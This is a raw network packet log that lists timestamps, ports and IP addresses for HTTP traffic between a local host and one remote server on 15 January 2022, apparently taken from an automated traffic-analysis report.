                Jan 15, 2022 01:14:06.779314041 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.779333115 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.779354095 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.779367924 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.779376030 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.779387951 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.779397011 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.779417992 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.779438019 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.779458046 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.779459000 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.779481888 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.779505968 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.779510021 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.779534101 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.779547930 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.779556036 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.779580116 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.779586077 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.779601097 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.779623985 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.779632092 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.779649973 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.779665947 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.779670954 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.779691935 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.779711962 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.779725075 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.779731989 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.779755116 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.779764891 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.779777050 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.779797077 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.779797077 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.779818058 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.779839039 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.779854059 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.779886961 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.878860950 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.879040003 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.879103899 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.879159927 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.879187107 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.879219055 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.879261017 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.879355907 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.879420996 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.879446983 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.879478931 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.879534960 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.879580975 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.879590988 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.879647017 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.879686117 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.879708052 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.879762888 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.879790068 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.879825115 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.879880905 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.879899025 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.879940033 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.880001068 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.880014896 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.880059004 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.880115986 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.880141973 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.880173922 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.880228996 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.880250931 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.880285978 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.880342960 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.880356073 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.880398989 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.880456924 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.880470037 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.880511045 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.880568981 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.880582094 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.880625010 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.880682945 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.880697012 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.880739927 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.880796909 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.880810022 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.880853891 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.880913019 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.880920887 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.880970001 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.881026030 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.881038904 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.881083965 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.881139040 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.881155968 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.881196022 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.881252050 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.881270885 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.881311893 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.881370068 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.881397963 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.881427050 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.881484032 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.881505966 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.881541014 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.881597042 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.881609917 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.881654024 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.881712914 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.881726027 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.881771088 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.881839991 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.980057955 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.980086088 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.980123997 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.980149031 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.980171919 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.980195999 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.980196953 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.980214119 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.980241060 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.980264902 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.980283022 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.980308056 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.980329990 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.980334044 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.980355024 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.980364084 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.980381012 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.980405092 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.980410099 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.980434895 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.980457067 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.980459929 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.980479956 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.980503082 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.980524063 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.980529070 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.980549097 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.980572939 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.980577946 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.980592966 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.980597019 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.980619907 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.980643034 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.980652094 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.980667114 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.980693102 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.980705023 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.980717897 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.980741024 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.980741024 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.980765104 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.980787992 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.980807066 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.980813026 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.980837107 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.980845928 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.980861902 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.980884075 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.980906010 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.980926991 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.980931044 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.980947018 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.980951071 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.980972052 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.980976105 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.980995893 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.981017113 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.981026888 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.981045008 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.981069088 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.981090069 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.981091022 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.981112957 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.981136084 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.981153011 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.981175900 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.981198072 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.981201887 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.981220007 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.981221914 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.981280088 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.079500914 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.079535007 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.079555035 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.079576015 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.079598904 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.079622984 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.079646111 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.079653978 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.079669952 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.079694033 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.079710960 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.079719067 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.079725027 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.079744101 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.079768896 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.079782009 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.079793930 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.079818964 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.079824924 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.079843044 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.079866886 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.079869032 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.079890013 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.079914093 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.079926968 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.079936981 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.079962015 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.079972029 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.079984903 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.080008030 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.080019951 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.080032110 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.080054998 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.080070972 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.080076933 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.080101967 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.080125093 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.080137014 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.080147028 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.080173016 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.080180883 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.080198050 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.080200911 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.080223083 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.080246925 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.080254078 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.080269098 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.080290079 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.080312014 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.080329895 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.080334902 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.080358982 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.080370903 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.080382109 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.080391884 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.080406904 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.080430031 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.080430984 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.080454111 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.080477953 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.080491066 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.080503941 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.080527067 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.080538034 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.080549002 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.080573082 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.080583096 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.080595016 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.080617905 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.080625057 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.080638885 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.080663919 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.080668926 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.080686092 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.080709934 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.080713987 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.080733061 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.080754995 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.080765009 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.080777884 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.080800056 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.080807924 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.080821991 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.080845118 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.080848932 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.080866098 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.080888987 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.080893993 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.080913067 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.080935001 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.080936909 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.080957890 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.080980062 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.080981016 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.081002951 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.081024885 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.081038952 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.081047058 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.081072092 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.081084967 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.081095934 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.081119061 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.081125975 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.081142902 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.081166029 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.081176996 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.081187963 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.081211090 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.081218004 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.081232071 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.081254005 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.081259012 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.081276894 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.081300020 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.081304073 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.081322908 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.081343889 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.081346035 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.081368923 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.081389904 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.081402063 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.081413031 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.081435919 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.081446886 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.081458092 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.081480980 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.081490993 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.081502914 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.081526041 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.081542015 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.081547976 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.081581116 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.081583023 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.081599951 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.081618071 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.081635952 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.081659079 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.081680059 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.081681967 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.081702948 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.081721067 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.081752062 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.179725885 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.179754019 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.179773092 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.179792881 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.179814100 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.179835081 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.179856062 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.179877996 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.179877996 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.179903030 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.179919004 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.179928064 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.179951906 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.179963112 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.179976940 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.179979086 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.180001974 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.180023909 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.180037975 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.180047035 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.180073977 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.180083990 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.180098057 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.180120945 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.180130005 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.180145025 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.180166960 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.180177927 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.180187941 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.180212975 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.180218935 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.180236101 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.180258989 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.180269957 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.180283070 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.180305004 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.180315971 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.180327892 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.180351973 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.180358887 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.180375099 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.180397987 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.180408955 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.180418968 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.180444002 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.180450916 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.180466890 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.180489063 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.180501938 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.180511951 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.180536985 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.180545092 CET4976080192.168.2.474.201.28.62
